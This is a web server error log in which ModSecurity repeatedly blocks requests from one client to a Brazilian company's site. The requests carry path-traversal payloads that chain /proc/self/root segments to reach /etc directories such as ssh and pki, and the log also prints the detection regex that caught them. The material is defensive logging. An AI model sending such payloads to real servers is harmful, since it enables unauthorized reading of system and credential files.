[Tue Mar 17 11:33:53.471548 2026] [:error] [pid 9155:tid 140411716749056] [client 74.7.243.203:57376] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmUdbI7zhHXcabyMUx4QAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:33:55.875144 2026] [:error] [pid 9155:tid 140411733534464] [client 74.7.243.203:57380] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmU9bI7zhHXcabyMUx5gAAAkE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:33:57.275344 2026] [:error] [pid 1016:tid 140411733534464] [client 74.7.243.203:57386] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmVZqmL8PQht4WJFlT5AAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:33:58.597150 2026] [:error] [pid 9155:tid 140411641214720] [client 74.7.243.203:57392] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmVtbI7zhHXcabyMUx6gAAAkw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:34:01.034154 2026] [:error] [pid 1016:tid 140411574073088] [client 74.7.243.203:57400] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmWZqmL8PQht4WJFlT7AAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:34:02.419007 2026] [:error] [pid 18380:tid 140411599251200] [client 74.7.243.203:33574] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmWq4xEDsg_V3ESNY-7AAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:34:03.763799 2026] [:error] [pid 18380:tid 140411574073088] [client 74.7.243.203:33578] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmW64xEDsg_V3ESNY-7gAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:34:05.128744 2026] [:error] [pid 7437:tid 140411540502272] [client 74.7.243.203:33586] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmXQeiSKl8TjouI-YNeAAAA9g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:34:06.540537 2026] [:error] [pid 7437:tid 140411632822016] [client 74.7.243.203:33598] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmXgeiSKl8TjouI-YNeQAAA80"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:34:07.876229 2026] [:error] [pid 2473:tid 140411699963648] [client 74.7.243.203:33602] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmX6BJNF7axNlVR0UIRAAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:34:09.185383 2026] [:error] [pid 18709:tid 140411557287680] [client 74.7.243.203:33608] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmYTarLhPAjZGI1b257QAAA5Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:34:11.522905 2026] [:error] [pid 18709:tid 140411565680384] [client 74.7.243.203:39976] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmYzarLhPAjZGI1b258gAAA5U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:34:12.847196 2026] [:error] [pid 18380:tid 140411616036608] [client 74.7.243.203:39988] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmZK4xEDsg_V3ESNY-8QAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:34:16.167708 2026] [:error] [pid 18709:tid 140411574073088] [client 74.7.243.203:39990] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmaDarLhPAjZGI1b259QAAA5Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:34:17.447072 2026] [:error] [pid 7437:tid 140411741927168] [client 74.7.243.203:39992] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmaQeiSKl8TjouI-YNfgAAA8A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:34:18.733478 2026] [:error] [pid 1016:tid 140411641214720] [client 74.7.243.203:39996] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmapqmL8PQht4WJFlUAAAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:34:20.029471 2026] [:error] [pid 2473:tid 140411540502272] [client 74.7.243.203:40004] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmbKBJNF7axNlVR0UIRQAAABg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:34:21.203101 2026] [:error] [pid 17965:tid 140411607643904] [client 74.7.243.203:57730] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmbat8Nd0UC_OcbVG7uAAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:34:22.568181 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.243.203:57742] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmbtY0UrI5A3LftIzuOAAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:34:24.811078 2026] [:error] [pid 2473:tid 140411708356352] [client 74.7.243.203:57748] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmcKBJNF7axNlVR0UISAAAAAQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:34:28.237792 2026] [:error] [pid 2473:tid 140411733534464] [client 74.7.243.203:57764] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmdKBJNF7axNlVR0UITAAAAAE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
